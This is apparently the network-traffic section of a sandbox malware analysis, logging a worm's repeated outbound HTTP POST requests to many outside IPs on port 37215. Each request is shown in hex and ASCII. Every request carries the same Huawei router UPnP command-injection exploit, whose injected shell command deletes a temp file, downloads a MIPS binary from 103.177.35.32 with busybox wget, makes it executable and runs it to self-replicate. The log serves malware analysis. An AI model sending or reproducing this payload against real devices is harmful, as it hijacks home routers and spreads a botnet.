                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1796192.168.2.2355716197.130.198.3337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.585438013 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1797192.168.2.234810441.79.175.7037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.585511923 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1798192.168.2.235551841.19.141.8437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.585515976 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1799192.168.2.234410441.95.36.20837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.585526943 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1800192.168.2.234411064.223.205.14637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.585572004 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1801192.168.2.235974039.108.51.10537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.585578918 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1802192.168.2.2358164197.204.89.8837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586020947 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1803192.168.2.234644441.78.178.18537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586031914 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1804192.168.2.235452841.61.165.25037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586038113 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1805192.168.2.2341698197.90.244.2037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.586091042 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
